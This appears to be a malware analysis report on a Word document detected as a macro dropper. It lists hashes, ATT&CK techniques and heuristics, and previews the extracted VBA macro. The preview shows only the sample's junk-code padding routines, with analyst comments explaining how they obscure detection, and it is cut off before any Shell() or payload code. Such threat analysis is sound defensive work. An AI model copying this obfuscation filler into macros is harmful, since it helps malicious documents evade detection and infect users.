Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 27d49e0d57bd638d…

MALICIOUS

Office (OLE)

181.6 KB · Created: 2018-07-20 15:29:00 · Authoring application: Microsoft Office Word · First seen: 2019-05-16
MD5: 20726d723b0af44bea75b9d9f6d9fdee
SHA-1: 15c33f512a5e5a6f9cfffad3b08b629c1b10ff97
SHA-256: 27d49e0d57bd638ddd7e779bd108bc9733d33905de4595fb46e5a3f620bc7708
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 (Visual Basic) · T1059 (Command and Scripting Interpreter) · T1204.002 (Malicious File)

The file contains a VBA macro that triggers on document open and uses the Shell() function. This indicates an attempt to execute arbitrary commands, a pattern commonly used to download and run additional malicious payloads. The ClamAV detection 'Doc.Dropper.Agent-6618513-0' further supports its role as a dropper.

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-6618513-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6618513-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    The decoded VBA source contains a call to the Shell() function.
  • Document_Open macro high OLE_VBA_DOCOPEN
    The module defines a Document_Open handler, which runs automatically when the document is opened.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 42066 bytes
SHA-256: 6c53d5612212d2c01374a58be6a7629f0a3da44b9901f8fa52074d10322365c4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "oCorzdV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as exported by olevba (see the "macros.bas" artifact entry above).
' VB_Base = "1Normal.ThisDocument" together with VB_PredeclaredId = True indicates
' this is the document's ThisDocument class module, i.e. the module in which a
' Document_Open handler would be auto-run by Word. The handler the report flags
' (OLE_VBA_DOCOPEN) is not within the lines shown; the preview is truncated.
' VB_Name is a random-looking identifier, consistent with the generated names
' used throughout the function bodies that follow.
' Padding ("junk code") routine.
' Every assignment below writes to a name that is never read again anywhere in
' the visible listing, the function never assigns its own return value, and no
' Shell() or other external call appears here. The Shell()/Document_Open behaviour
' flagged in the report presumably lives in code outside the lines shown.
' None of the operands is declared in this listing; without Option Explicit they
' are empty Variants, so the divisions would normally raise a runtime error —
' the "On Error Resume Next" on the first line silences that, which is why the
' routine runs to completion without doing anything observable.
' Analyst note: the same skeleton (If/ElseIf, a "For ... = 96 To 3879" loop, the
' literal "183388958 + 155564576") repeats in each If block and again in
' NKIlIUbQzwV below. This looks like generated filler meant to inflate the module
' and blunt signature/heuristic matching rather than to compute anything.
Private Function uDlRlVhivZIL()
On Error Resume Next
   ' Block 1 of 5 — identical structure, fresh random identifiers each time.
   ' The comparison operands are undeclared, so which branch runs is not
   ' meaningful for analysis; neither branch has a side effect that survives.
   If zKFjJm >= HOQzu Then
      qBiKo = 183388958 + 155564576
      ElseIf qaRpn < LvwQY Then
      ' 3784 iterations of a division chain whose result is discarded.
      For bBUCl = 96 To 3879
         OMPLI = 58118 / kkjzV * jliPYj / SfwqG / (82454 * 81877 * 17115 + ttoQX)
      Next
      bJiSnj = Ubwbc / WslvWQ + 77999 - OYFRnA - (qqKEP * JZkGso / KWuiO / mfHzSz * 67357 * NkZAz)
   End If
   ' Blocks 2–5: same pattern as block 1 with different names and constants.
   If bdiwEO >= wjGuoT Then
      jOmTzT = 183388958 + 155564576
      ElseIf onUfmz < pNRfCr Then
      For frOAR = 96 To 3879
         wUfWwC = 77076 / hnpOlT * qNQSQJ / WoOmb / (69318 * 8298 * 44074 + SfdjU)
      Next
      wjjJp = acRQY / odziB + 63258 - zqHJbE - (KPWiHm * hPhjG / zwMzV / NPsZj * 58536 * qWRqZH)
   End If
   If dllWNG >= TBpdc Then
      YriaD = 183388958 + 155564576
      ElseIf NjjtsF < YwoLFt Then
      For YhkJH = 96 To 3879
         saMGH = 79623 / JoVGw * LSKtst / jiQiq / (69567 * 68806 * 39350 + qHVTC)
      Next
      nUclCi = jaiMH / pOnsPq + 39374 - KhQXF - (JzOkf * PfqQHq / Jwpvdc / fmCOF * 55302 * kcmMNz)
   End If
   If lMwjN >= JXWlY Then
      KMVmm = 183388958 + 155564576
      ElseIf EXWvzi < MfCEE Then
      For tCwMcz = 96 To 3879
         PiVOfd = 63062 / XXHzZ * sIqqM / dAnGT / (35186 * 83713 * 60398 + OAsop)
      Next
      VBIPWw = pHuEib / uFVPi + 38176 - vPuNl - (QIXPL * lXHibq / vLjLP / PiKJic * 20224 * RZmNB)
   End If
   If Rjjfst >= cnXuZJ Then
      DPDfZ = 183388958 + 155564576
      ElseIf WFztn < PTzUU Then
      For FYiiw = 96 To 3879
         WtZCXl = 68375 / BzOKj * bOaLhq / siWiSC / (41370 * 37542 * 71654 + YTWIjw)
      Next
      iNJkz = Enlmz / zSzFoi + 29436 - XFjOj - (DprMZ * SFdTjH / MRrjPY / nbbNhi * 32343 * zcivBj)
   End If
End Function
' Second padding routine — structurally identical to uDlRlVhivZIL above: five
' If/ElseIf blocks, each with a "96 To 3879" loop over a division chain and the
' repeated literal "183388958 + 155564576". No assigned name is read again in
' the visible listing, there is no return value, and no call to Shell() or any
' other external routine appears in this function.
' All operands are undeclared here; "On Error Resume Next" swallows the runtime
' errors the arithmetic on empty Variants would otherwise raise, so the routine
' has no observable effect. For detection purposes the presence of this filler
' is itself the signal (see OLE_VBA_MACROS), not any value it computes.
Private Function NKIlIUbQzwV()
On Error Resume Next
   ' Block 1 of 5 — same pattern as in uDlRlVhivZIL, new random identifiers.
   If HsSLR >= Gbimp Then
      QJSTqd = 183388958 + 155564576
      ElseIf VBfGw < zVujS Then
      For dOFRE = 96 To 3879
         iwEsr = 61956 / NITQn * pZwSQb / VAUqLu / (23270 * 36919 * 24232 + LsOuH)
      Next
      zcKzwi = dEHrc / iwppSD + 67111 - NhwUoA - (IYZvht * pFcnn / qmDDjZ / RWCwqY * 7752 * vNfKhH)
   End If
   ' Blocks 2–5: identical structure, differing only in names and constants.
   If uwvmz >= WlmHf Then
      lGULbn = 183388958 + 155564576
      ElseIf DIjpZ < oWHMfY Then
      For cOpwDF = 96 To 3879
         oHqbD = 55365 / WNGEX * PSvKI / pJCPY / (13010 * 66959 * 74747 + WQYIW)
      Next
      RvSIm = sRIAIH / cKTfn + 65286 - LlsRU - (pAzwi * BowXdC / YwruO / zSKuD * 72147 * aGIjDA)
   End If
   If iwuAiH >= NiQlma Then
      tkOTdl = 183388958 + 155564576
      ElseIf cEJpQ < swdFpU Then
      For VHpZD = 96 To 3879
         npSan = 33536 / RUuvO * jKFrlL / MqQBK / (92046 * 34910 * 38529 + lvpPT)
      Next
      jKiVXG = YChqLk / PPDNpz + 93010 - QPrzp - (izGwL * ivNPnH / SOUUkh / sWrba * 41534 * HtPiY)
   End If
   If pCarz >= SUCoai Then
      dKwvG = 183388958 + 155564576
      ElseIf SRLIi < piXBw Then
      For OqRcMt = 96 To 3879
         lhFXUD = 2218 / IYwwUX * wBdtv / JRvTE / (4782 * 22220 * 83386 + BwDSVj)
      Next
      urFdh = KaEdOI / PwSzJb + 32256 - EQApA - (XztBB * mHmoS / cHUOao / wjCjF * 18381 * TBpbEo)
   End If
   If mcLcM >= GIMdfX Then
      JqqpMm = 183388958 + 155564576
      ElseIf jVRnr < DkRKj Then
      For FHUsCz = 96 To 3879
         RsYpCZ = 73499 / JLzlsB * oRKXkF / WqBuBS / (84226 * 79259 * 96244 + skUJIf)
      Next
      OFMtY = YrcZS / hfMWj + 43254 - oIXUDU - (MtHhW * mvJfso / YcDZsZ / RIfOkm * 50943 * HqlJZL)
   End If
End Function
Private Function ZNBZsodYhlDmfZ()
On Error Resume Next
   If wtJqK >= ZjHSpE Then
      boHjv = 183388958 + 155564576
      ElseIf icWOsw < PHFSZb Then
      For cIvzt = 96 To 3879
         Jljfah = 44610 / qMrlwr * hciQsW / SaptO / (5511 * 70693 * 36367 + JmzYzw)
      Next
      nLatZu = hajQu / QjBckT + 1126
... (truncated)